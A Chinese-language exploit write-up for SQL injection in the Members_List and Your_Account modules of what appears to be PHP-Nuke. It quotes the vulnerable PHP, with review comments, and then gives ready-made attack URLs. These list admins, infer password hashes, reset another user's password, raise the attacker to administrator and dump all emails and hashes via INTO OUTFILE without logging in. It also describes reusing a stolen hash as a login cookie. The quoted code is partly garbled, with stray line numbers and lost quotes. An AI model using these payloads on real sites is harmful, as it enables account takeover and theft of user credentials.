利用SQL注入缺陷进行攻击的方法及代码


该应用（从 Your_Account 模块代码中引用的 $nukeurl 全局变量以及 modules.php?name= 形式的 URL 判断，应为 PHP-Nuke）的 Members_List、Your_Account 模块中存在 SQL 注入缺陷：来自请求的参数（$letter、$sortby、$uname、$theme 等）未经转义或类型转换即被直接拼接进 SQL 语句。当 PHP 的 magic_quotes_gpc 选项为“OFF”（即请求参数中的单引号不会被自动加上反斜杠）时，攻击者可使用下列攻击方法及代码利用该缺陷。注意：本页转载的代码和攻击 URL 中的单引号字符已经丢失（例如 where uname != Anonymous 原应为 where uname != 'Anonymous'；结合 magic_quotes_gpc 这一前提可以推断，攻击 URL 中的 letter=%20OR... 等 payload 原应以一个单引号开头以闭合字符串字面量），代码中的 &&、< 被显示为 &amp;&amp;、&lt;，URL 中的 &amp; 即 &，阅读时需自行还原。

PHP代码/位置:

/modules/Members_List/index.php :
------------------------------------------------------------------------
[...]
// Member-list query assembly (fragment quoted from Members_List/index.php).
// NOTE(review): the listing as reproduced on this page appears to have lost
// its SQL string quotes (e.g. `uname != Anonymous`, where a string literal is
// clearly intended), so read every `$var` below as being spliced into the
// query text; the exploit URLs further down rely on exactly that.
$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
$select = "select uid, name, uname, femail, url from
".$user_prefix."_users ";
$where = "where uname != Anonymous ";

// $letter comes from the request (the exploit URLs pass `letter=` in the
// query string). Any value other than "Other"/"All" goes into the LIKE
// pattern without escaping -> SQL injection; a trailing `/*` in the payload
// comments out the remainder of the statement (ORDER BY / LIMIT).
if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
$where .= "AND uname like ".$letter."% ";

} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
// The second condition is redundant: $letter == "Other" already implies
// $letter != "All".
$where .= "AND uname REGEXP "^\[1-9]" ";

} else {
$where .= "";
}
// $sortby is interpolated straight after ORDER BY, so any column of the
// users table can be named, including `pass` (see the sortby=pass URL below).
// The usual fix is a whitelist of permitted column names.
$sort = "order by $sortby";
// $min / $max are concatenated into LIMIT without an (int) cast.
$limit = " ASC LIMIT ".$min.", ".$max;

$count_result = sql_query($count.$where, $dbi);
$num_rows_per_order = mysql_result($count_result,0,0);

// Both the COUNT query and the page query carry the injected $where.
$result = sql_query($select.$where.$sort.$limit, $dbi) or die();

// NOTE(review): the `1` inside this echo looks like a gutter number leaked in
// from the page reproduction rather than part of the original output.
echo "

1<br/>

";
if ( $letter != "front" ) {
echo "

  1<table border='\"0\"' cellspacing='\"1\"' width='\"100%\"'><tr>\n";   
  2echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._NICKNAME."</b></font></td>\n";   
  3echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._REALNAME."</b></font></td>\n";   
  4echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._EMAIL."</b></font></td>\n";   
  5echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._URL."</b></font></td>\n";   
  6$cols = 4;   
  7[...]   
  8\------------------------------------------------------------------------   
  9  
 10/modules/Your_Account/index.php :   
// Request dispatcher of modules/Your_Account/index.php (cases omitted by the
// advisory are shown as `[...]`). $op and every argument handed to the
// handlers are request variables -- the exploit URLs on this page pass them
// in the query string -- and, as the handler listings below show, most of
// them reach sql_query() without escaping or casting.
switch($op) {
[...]
// $uname -> mail_password(): spliced into `where (uname=$uname)`; this is the
// unauthenticated INTO OUTFILE vector used further down.
case "mailpasswd":
mail_password($uname, $code);
break;

// $uname -> userinfo(): spliced into `where uname=$uname`.
case "userinfo":
userinfo($uname, $bypass, $hid, $url);
break;

// $uname -> login(): spliced into `where uname=$uname` (also unauthenticated).
case "login":
login($uname, $pass);
break;
[...]
// The save* handlers require a valid login cookie, but then interpolate
// the submitted fields straight into an UPDATE ... SET clause.
case "saveuser":
saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,
$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
break;
[...]
case "savehome":
savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
$popmeson);
break;

case "savetheme":
savetheme($uid, $theme);
break;
[...]
case "savecomm":
savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
break;
[...]
}
 45\------------------------------------------------------------------------   
 46  
 47/modules/Your_Account/index.php :   
 48[...]   
/**
 * Persist the profile edits submitted by the "saveuser" form.
 *
 * Every parameter arrives straight from the request. Access control is a
 * comparison of the login cookie (username + password hash) against the
 * users table plus `$uid == $vuid`; the UPDATE statements then interpolate
 * each field into the SET clause unescaped, so any logged-in user can inject
 * `,user_level=4` or `,pass=<hash> where uname=<victim>/*` through e.g.
 * $realname, $email, $femail or $url (see the exploit URLs on this page).
 *
 * NOTE(review): the listing is HTML-escaped as reproduced (`&amp;&amp;` is
 * `&&`, `&lt;` is `<`) and has apparently lost its SQL string quotes; it is
 * kept as found. Fix direction: cast $uid to int and escape (or bind) every
 * string value before it reaches sql_query().
 */
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,
$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi,
$module_name;
// Cookie[1] = username, Cookie[2] = password hash (matches the argument
// order of doCookie() below).
Cookiedecode($user);
$check = $Cookie[1];
$check2 = $Cookie[2];
// $check is cookie-controlled and is itself spliced into the query unescaped.
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname=$check", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
// Authorisation: the submitted uid must belong to the cookie's user and the
// cookie must carry the stored hash itself -- so possessing someone's hash
// is enough to pass this check without knowing the password.
if (($uid == $vuid) AND ($check2 == $ccpass)) {
// Prefix the URL with http:// when missing; the `url=http://,user_level=4`
// payload on this page is shaped to survive this.
if (!eregi("http://";, $url)) {
$url = "http://$url";
}
if ((isset($pass)) &amp;&amp; ("$pass" != "$vpass")) {
echo "<center>"._PASSDIFFERENT."</center>";
// NOTE(review): $minpass is not in the `global` list above, so unless it is
// defined some other way this minimum-length check compares against an
// unset variable and cannot trip.
} elseif (($pass != "") &amp;&amp; (strlen($pass) &lt; $minpass)) {
echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b>
"._CHARLONG."</center>";
} else {
// $bio is the only field that gets any quote handling (FixQuotes).
if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio =
FixQuotes($bio); }
if ($pass != "") {
Cookiedecode($user);
sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);
// Unsalted MD5 of the new password; the same value is later placed in the
// login cookie.
$pass = md5($pass);
// All SET values except $pass and $bio are raw request input.
sql_query("update ".$user_prefix."_users set name=$realname,
email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio ,
user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,
user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,
user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,
newsletter=$newsletter where uid=$uid", $dbi);
// Re-read the row (by request-supplied $uname, again unescaped) to rebuild
// the login cookie with the new hash.
$result = sql_query("select uid, uname, pass, storynum, umode, uorder,
thold, noscore, ublockon, theme from ".$user_prefix."_users where
uname=$uname and pass=$pass", $dbi);
if(sql_num_rows($result, $dbi)==1) {
$userinfo = sql_fetch_array($result, $dbi);

doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],
$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
$userinfo[theme],$userinfo[commentmax]);
} else {
// Output is sent here before the Header() redirect at the end of this
// branch, so that redirect runs into "headers already sent" on this path.
echo "<center>"._SOMETHINGWRONG."</center><br/>";
}
sql_query("UNLOCK TABLES", $dbi);
} else {
// Same unescaped UPDATE, minus the password column.
sql_query("update ".$user_prefix."_users set name=$realname,
email=$email, femail=$femail, url=$url, bio=$bio,
user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,
user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,
user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,
newsletter=$newsletter where uid=$uid", $dbi);
// $a is computed but never used in this function.
if ($attach) {
$a = 1;
} else {
$a = 0;
}
}
Header("Location: modules.php?name=$module_name");
}
}
}
112[...]   
/**
 * Persist the "home" preferences (story count, user block, broadcast, pop-up
 * messages) for the logged-in user.
 *
 * Authorisation is the same cookie-vs-database check as in saveuser(). Of the
 * fields written, $ublockon is forced to 0/1 and $ublock goes through
 * FixQuotes(); $storynum, $broadcast and $popmeson are raw request values
 * interpolated into the SET clause, which is what the storynum=/broadcast=
 * exploit URLs on this page use. $uname is accepted but not used here.
 */
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
$popmeson) {
global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
// Cookie[1] = username, Cookie[2] = password hash.
Cookiedecode($user);
$check = $Cookie[1];
$check2 = $Cookie[2];
// Cookie-controlled $check is spliced into the query unescaped.
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname=$check", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
// A matching hash in the cookie is sufficient; no password is needed.
if (($uid == $vuid) AND ($check2 == $ccpass)) {
// $ublockon is rewritten to 1/0 before the query, so -- contrary to the
// ublockon= exploit URL listed on this page -- it is not injectable in the
// code as shown.
if(isset($ublockon)) $ublockon=1; else $ublockon=0;
$ublock = FixQuotes($ublock);
sql_query("update ".$user_prefix."_users set storynum=$storynum,
ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast,
popmeson=$popmeson where uid=$uid", $dbi);
// Refresh $userinfo from the database and re-issue the login cookie.
getusrinfo($user);
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],
$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
$userinfo[theme],$userinfo[commentmax]);
Header("Location: modules.php?name=$module_name");
}
}
135  
/**
 * Store the theme chosen by the logged-in user.
 *
 * Same cookie-vs-database authorisation as saveuser(). $theme is interpolated
 * into `set theme=$theme where uid=$uid` unescaped: with a payload such as
 * `,name=... where uname=Admin/*` the injected WHERE replaces the original
 * one (commented out by `/*`), so the UPDATE lands on an arbitrary account
 * (see the exploit URLs on this page).
 */
function savetheme($uid, $theme) {
global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
// Cookie[1] = username, Cookie[2] = password hash.
Cookiedecode($user);
$check = $Cookie[1];
$check2 = $Cookie[2];
// Cookie-controlled $check is spliced into the query unescaped.
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname=$check", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
// A matching hash in the cookie is sufficient; no password is needed.
if (($uid == $vuid) AND ($check2 == $ccpass)) {
// Injection point: $theme and $uid, both request-supplied and unescaped.
sql_query("update ".$user_prefix."_users set theme=$theme where
uid=$uid", $dbi);
getusrinfo($user);
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],
$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
$userinfo[theme],$userinfo[commentmax]);
// NOTE(review): the raw $theme is also reflected into the Location header;
// whether a newline in it can inject further headers depends on the PHP
// version in use.
Header("Location: modules.php?name=$module_name&amp;theme=$theme");
}
}
154[...]   
/**
 * Store the comment-display preferences of the logged-in user.
 *
 * Same cookie-vs-database authorisation as saveuser(). $noscore is forced to
 * 0/1; $umode, $uorder, $thold and $commentmax are raw request values
 * interpolated into the SET clause (the umode=/uorder=/thold= exploit URLs on
 * this page). $uname is accepted but not used here.
 */
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore,
$commentmax) {
global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
// Cookie[1] = username, Cookie[2] = password hash.
Cookiedecode($user);
$check = $Cookie[1];
$check2 = $Cookie[2];
// Cookie-controlled $check is spliced into the query unescaped.
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname=$check", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
// A matching hash in the cookie is sufficient; no password is needed.
if (($uid == $vuid) AND ($check2 == $ccpass)) {
// $noscore is normalised to 1/0 and is therefore not an injection point.
if(isset($noscore)) $noscore=1; else $noscore=0;
sql_query("update ".$user_prefix."_users set umode=$umode,
uorder=$uorder, thold=$thold, noscore=$noscore,
commentmax=$commentmax where uid=$uid", $dbi);
// Refresh $userinfo from the database and re-issue the login cookie.
getusrinfo($user);
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],
$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],
$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
Header("Location: modules.php?name=$module_name");
}
}
176[...]   
177\------------------------------------------------------------------------   
178  
179/modules/Your_Account/index.php :   
180[...]   
181function mail_password($uname, $code) {   
182global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi,   
183$module_name;   
184$result = sql_query("select email, pass from ".$user_prefix."_users   
185where (uname=$uname)", $dbi);   
186if(!$result) {   
187include("header.php");   
188OpenTable();   
189echo "<center>"._SORRYNOUSERINFO."</center>";   
190CloseTable();   
191include("footer.php");   
192[...]   
193\------------------------------------------------------------------------   
194  
195  
196\------------------------------------------------------------------------   
197[...]   
198function userinfo($uname, $bypass=0, $hid=0, $url=0) {   
199global $user, $Cookie, $sitename, $prefix, $user_prefix, $dbi, $admin,   
200$broadcast_msg, $my_headlines, $module_name;   
201$result = sql_query("select uid, femail, url, bio, user_avatar,   
202user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest,   
203user_sig, pass, newsletter from ".$user_prefix."_users where   
204uname=$uname", $dbi);   
205$userinfo = sql_fetch_array($result, $dbi);   
206[...]   
207\------------------------------------------------------------------------   
208  
209  
210\------------------------------------------------------------------------   
211[...]   
/**
 * Handle the login form (body truncated in the advisory; only the lookup is
 * shown).
 *
 * $uname is request-supplied and goes into `where uname=$uname` unescaped,
 * before any credential check -- so the query is injectable without an
 * account. The admin.txt exploit URL on this page appends
 * `OR user_level>1 INTO OUTFILE ...` here, which additionally needs the
 * MySQL FILE privilege and a server-writable target directory.
 */
function login($uname, $pass) {
global $setinfo, $user_prefix, $dbi, $module_name;
$result = sql_query("select pass, uid, storynum, umode, uorder, thold,
noscore, ublockon, theme, commentmax from ".$user_prefix."_users where
uname=$uname", $dbi);
$setinfo = sql_fetch_array($result, $dbi);
[...]
}
220[...]   
221\------------------------------------------------------------------------   
222---  
223  
224  
Members_List模块（注入点：$letter 直接拼入 LIKE 模式，$sortby 直接拼入 ORDER BY；payload 末尾的 /* 用于注释掉原语句剩余的 ORDER BY / LIMIT 部分）:

\- 按 pass（密码散列）列排序显示用户列表（sortby 可指定 users 表的任意列名）:

http://[target]/modules.php?name=Members_List&letter=All&sortby=pass

\- 按 uid 排序显示用户列表:

http://[target]/modules.php?name=Members_List&letter=All&sortby=uid

\- 显示 moderators（user_level=2 的用户）:

http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=2/*

\- 显示管理员（user_level=4 的用户）:

http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=4/*

\- 显示所有密码散列（pass 列，而非用户名）以“abc”开头的用户；逐字符变换前缀并重复请求，即可推断出任意用户的完整密码散列（布尔型盲注）:

http://[target]/modules.php?name=Members_List&letter=%20OR%20pass%20LIKE%20abc%25/*
246  
Your_Account模块（以下各 save* 利用均需先以一个普通账户登录：这些函数会先用 cookie 中的用户名和密码散列查询数据库，并要求请求中的 uid 等于该账户的 uid，[OUR_UID] 即攻击者自己的 uid；注入点位于 UPDATE 语句的 SET 子句）:

\- 将“Admin”用户更名为“Hophophop”（通过 savetheme 的 theme 参数注入，/* 注释掉原有的 where uid=[OUR_UID]，使 UPDATE 作用于 Admin 账户）:

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,name=Hophophop%20where%20uname=Admin/*&uid=[OUR_UID]
252  
\- 将“Bob”的密码散列改为 d41d8cd98f00b204e9800998ecf8427e，即 md5("")，相当于把 Bob 的密码改为空字符串（可借用任意一个未经处理的 SET 字段注入）:

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=saveuser&realname=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=saveuser&email=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savehome&storynum=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或（注意：按上文列出的 savehome() 代码，$ublockon 在拼入 SQL 前会被 isset() 检查强制改写为 1 或 0，因此该参数在所示版本的代码中应不可注入）:

http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savecomm&umode=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savecomm&thold=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
281  
\- 将普通用户（攻击者自己的账户）的 user_level 改为 4，提升至管理员权限；注入点同样在 SET 子句，由于原语句的 where uid=[OUR_UID] 正好指向攻击者自己，这里无需再用 /* 截断:

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,user_level=4&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=saveuser&femail=,user_level=4&uid=[OUR_UID]

或（saveuser() 会给不含 http:// 的 url 自动加上该前缀，因此 payload 以 http:// 开头）:

http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://,user_level=4&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=,user_level=4&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=,user_level=4&uid=[OUR_UID]
301  
\- 将所有用户的电子邮件和 MD5 密码散列通过 SELECT ... INTO OUTFILE 写入 http://[target]/AllMailPass.txt（注入点为 mail_password() 中的 where (uname=$uname)，payload 开头的 ) 用于闭合括号；该步骤不需要登录，但要求站点使用的 MySQL 账户具有 FILE 权限、MySQL 服务进程对 [path/to/site] 目录有写权限，且目标文件尚不存在）:

http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=)%20OR%201=1%20INTO%20OUTFILE%20/[path/to/site]/AllMailPass.txt/*

得到密码散列后无需破解：登录 cookie 中直接携带密码散列（见 doCookie(..., $userinfo[pass], ...)），而各 save* 函数只是把 cookie 中的散列与数据库的 pass 字段比较（$check2 == $ccpass），因此把散列放入 cookie 即可以该用户身份访问其账户。
308  
\- 将所有 user_level > 1 的用户（版主和管理员）的记录写入 http://[target]/admin.txt（注入点为 login() 中的 where uname=$uname，同样无需登录；FILE 权限与目录可写的前提同上）:

http://[target]/modules.php?name=Your_Account&op=login&uname=%20OR%20user_level>1%20INTO%20OUTFILE%20/[path/to/site]/admin.txt

[path/to/site]（站点在服务器文件系统中的绝对路径）可通过访问 http://[target]/modules/Forums/bb_smilies.php 获得（该页面会泄露站点路径）。